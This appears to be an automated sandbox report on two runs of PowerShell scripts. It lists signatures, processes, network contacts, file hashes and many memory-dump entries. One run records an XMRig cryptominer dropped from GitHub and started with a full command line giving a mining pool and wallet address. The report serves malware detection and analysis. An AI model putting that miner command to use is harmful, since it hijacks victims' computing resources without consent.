memory/4296-96-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-97-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-98-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-99-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-100-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-101-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-102-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-103-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-104-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-105-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-106-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-107-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-108-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-109-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-110-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-111-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-112-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-113-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-114-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-115-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-116-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-117-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:04

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/1844-0-0x00007FFFD8E43000-0x00007FFFD8E45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nbcer0p.e3b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1844-10-0x000001FD79030000-0x000001FD79052000-memory.dmp

memory/1844-11-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/1844-12-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/1844-14-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/1844-15-0x000001FD79420000-0x000001FD79432000-memory.dmp

memory/1844-16-0x000001FD79400000-0x000001FD7940A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4664-47-0x000001A84D260000-0x000001A84D280000-memory.dmp

memory/4664-48-0x000001A84EB70000-0x000001A84EB90000-memory.dmp

memory/4664-49-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/1844-50-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/4664-52-0x000001A84EBB0000-0x000001A84EBD0000-memory.dmp

memory/4664-51-0x000001A84EB90000-0x000001A84EBB0000-memory.dmp

memory/1844-54-0x00007FFFD8E43000-0x00007FFFD8E45000-memory.dmp

memory/4664-53-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/1844-56-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp

memory/4664-55-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-57-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-59-0x000001A84EBB0000-0x000001A84EBD0000-memory.dmp

memory/4664-58-0x000001A84EB90000-0x000001A84EBB0000-memory.dmp

memory/4664-60-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-61-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-62-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-63-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-64-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-65-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-66-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-67-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-68-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-69-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-70-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-71-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-72-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-73-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-74-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-75-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-76-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-77-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-78-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-79-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-80-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-81-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-82-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-83-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-84-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-85-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-86-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-87-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-88-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-89-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-90-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-91-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-92-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-93-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-94-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-95-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-96-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-97-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-98-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-99-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-100-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-101-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-102-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-103-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-104-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-105-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-106-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-107-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-108-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-109-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-110-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-111-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-112-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-113-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-114-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-115-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-116-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-117-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

memory/4664-118-0x00007FF62C910000-0x00007FF62D543000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:09

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4328,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3640,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/4656-0-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp

memory/4656-1-0x000001FAFC530000-0x000001FAFC552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2hsruara.gkb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4656-11-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-12-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-13-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-14-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-15-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp

memory/4656-16-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp

memory/4656-17-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp